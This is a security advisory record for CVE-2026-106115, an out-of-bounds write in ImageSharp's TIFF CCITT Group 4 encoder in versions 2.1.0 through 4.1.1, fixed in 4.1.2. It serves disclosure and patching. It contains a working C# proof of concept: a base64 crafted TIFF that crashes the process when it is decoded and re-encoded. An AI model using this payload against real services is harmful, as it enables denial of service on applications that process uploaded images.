{"schema_version":"1.9.0","id":"GHSA-jjfr-hcj7-qf5w","published":"2026-10-07T20:24:46Z","modified":"2026-10-07T20:30:07.102954557Z","aliases":["CVE-2026-106115"],"summary":"ImageSharp: TIFF CCITT T6 encoder writes beyond an undersized output buffer","details":"### Summary\n\nThe TIFF CCITT Group 4 (T6) encoder writes beyond its logical compressed-data buffer when encoding a 1-bit image. A valid 1×1 Group 4 TIFF decoded and re-encoded with the default `TiffEncoder` terminates the process with an unhandled exception.\n\n### Affected package and versions\n\n- Package: `SixLabors.ImageSharp` (NuGet)\n- Affected range: `>= 2.1.0, <= 4.1.1`\n- Commit `0815358f9202a78bc7f3b83e19282dc3654b500f` corresponds to release **v4.1.1**.\n\nThe T6 compressor was introduced by commit `3c9eb470a07a15012c2a29ad84090dcc804a7975`, first released in v2.1.0, with the same `Width * rowsPerStrip` allocation and unchecked code writes. The 1×1 exploit terminates published v2.1.0 and v4.1.1; its uncompressed control succeeds. Source history shows no capacity fix through v4.1.1.\n### Details\n\n[`TiffCcittCompressor.Initialize`](https://github.com/SixLabors/ImageSharp/blob/0815358f9202a78bc7f3b83e19282dc3654b500f/src/ImageSharp/Formats/Tiff/Compression/Compressors/TiffCcittCompressor.cs#L527-L532) allocates `Width * rowsPerStrip` bytes. A 1×1 strip therefore receives one byte.\n\nAfter encoding the row, [`T6BitCompressor.CompressStrip`](https://github.com/SixLabors/ImageSharp/blob/0815358f9202a78bc7f3b83e19282dc3654b500f/src/ImageSharp/Formats/Tiff/Compression/Compressors/T6BitCompressor.cs#L53-L131) appends two 12-bit EOFB codes. [`WriteCode`](https://github.com/SixLabors/ImageSharp/blob/0815358f9202a78bc7f3b83e19282dc3654b500f/src/ImageSharp/Formats/Tiff/Compression/Compressors/TiffCcittCompressor.cs#L466-L479) writes those bits without checking the destination capacity. The final checked slice detects the oversized byte count and throws `ArgumentOutOfRangeException`, after the unchecked writes have exceeded the one-byte span.\n\nThe default TIFF encoder can inherit `CcittGroup4Fax` and 1-bit settings from decoded frame metadata. The reproduction uses that decode-and-re-encode path.\n\n### Tested environment\n\n- Published NuGet package: `SixLabors.ImageSharp` 4.1.1\n- Target framework: `net8.0`\n- .NET SDK: 8.0.424\n- .NET runtime: 8.0.30\n- Operating system: Debian GNU/Linux 12, ARM64, Docker\n\nNo active exploitation is known.\n\n### Reproduction\n\nCreate a `net8.0` project referencing the published 4.1.1 assembly and use this `Program.cs`:\n\n```csharp\nusing SixLabors.ImageSharp;\nusing SixLabors.ImageSharp.Formats.Tiff;\nusing SixLabors.ImageSharp.Formats.Tiff.Constants;\n\nstring mode = args.FirstOrDefault() ?? \"exploit\";\nbyte[] input = Convert.FromBase64String(\n    \"SUkqAAgAAAAJAAABAwABAAAAAQAAAAEBAwABAAAAAQAAAAIBAwABAAAAAQAAAAMBAwABAAAABAAAAAYBAwABAAAAAAAAABEBBAABAAAAegAAABUBAwABAAAAAQAAABYBBAABAAAAAQAAABcBBAABAAAABAAAAAAAAACACACA\");\n\nusing Image image = Image.Load(input);\nvar metadata = image.Frames.RootFrame.Metadata.GetTiffMetadata();\nConsole.WriteLine($\"ImageSharp={typeof(Image).Assembly.GetName().Version}\");\nConsole.WriteLine($\"mode={mode} decoded={image.Width}x{image.Height} compression={metadata.Compression} bits={metadata.BitsPerPixel}\");\n\nusing var output = new MemoryStream();\nif (mode == \"control\")\n{\n    image.Save(output, new TiffEncoder { Compression = TiffCompression.None });\n}\nelse\n{\n    image.Save(output, new TiffEncoder());\n}\n\nConsole.WriteLine($\"encoded=True bytes={output.Length}\");\n```\n\nRun:\n\n```text\ndotnet run -- exploit\ndotnet run -- control\n```\n\nThe exploit produced exit code 134:\n\n```text\nImageSharp=4.0.0.0\nmode=exploit decoded=1x1 compression=CcittGroup4Fax bits=Bit1\nUnhandled exception. System.ArgumentOutOfRangeException: Specified argument was out of the range of valid values.\n   at SixLabors.ImageSharp.Formats.Tiff.Compression.Compressors.TiffCcittCompressor.CompressStrip(Span`1 rows, Int32 height)\n```\n\nThe control completed with exit code 0:\n\n```text\nImageSharp=4.0.0.0\nmode=control decoded=1x1 compression=CcittGroup4Fax bits=Bit1\nencoded=True bytes=212\n```\n\n### Impact\n\nOne attacker-supplied Group 4 TIFF can select this unsafe encoder path when an application decodes it and re-encodes it with inherited TIFF metadata. The demonstrated result is an unhandled exception and process termination in the reproduction. The report is limited to the T6 encoder path.","affected":[{"package":{"name":"SixLabors.ImageSharp","ecosystem":"NuGet","purl":"pkg:nuget/SixLabors.ImageSharp"},"ranges":[{"type":"ECOSYSTEM","events":[{"introduced":"2.1.0"},{"fixed":"4.1.2"}]}],"versions":["2.1.0","2.1.1","2.1.10","2.1.11","2.1.12","2.1.13","2.1.2","2.1.3","2.1.4","2.1.5","2.1.6","2.1.7","2.1.8","2.1.9","3.0.0","3.0.1","3.0.2","3.1.0","3.1.1","3.1.10","3.1.11","3.1.12","3.1.2","3.1.3","3.1.4","3.1.5","3.1.6","3.1.7","3.1.8","3.1.9","4.0.0","4.1.0","4.1.1"],"database_specific":{"last_known_affected_version_range":"<= 4.1.1","source":"https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2026/10/GHSA-jjfr-hcj7-qf5w/GHSA-jjfr-hcj7-qf5w.json"}}],"references":[{"type":"WEB","url":"https://github.com/SixLabors/ImageSharp/security/advisories/GHSA-jjfr-hcj7-qf5w"},{"type":"ADVISORY","url":"https://nvd.nist.gov/vuln/detail/CVE-2026-106115"},{"type":"WEB","url":"https://github.com/SixLabors/ImageSharp/pull/3187"},{"type":"WEB","url":"https://github.com/SixLabors/ImageSharp/commit/a9498c6db3642ef92c712ebc81e706914ac16a95"},{"type":"PACKAGE","url":"https://github.com/SixLabors/ImageSharp"},{"type":"WEB","url":"https://github.com/SixLabors/ImageSharp/releases/tag/v4.1.2"}],"database_specific":{"cwe_ids":["CWE-787"],"github_reviewed":true,"github_reviewed_at":"2026-10-07T20:24:46Z","nvd_published_at":"2026-10-06T18:16:53Z","severity":"HIGH"},"severity":[{"type":"CVSS_V3","score":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"}]}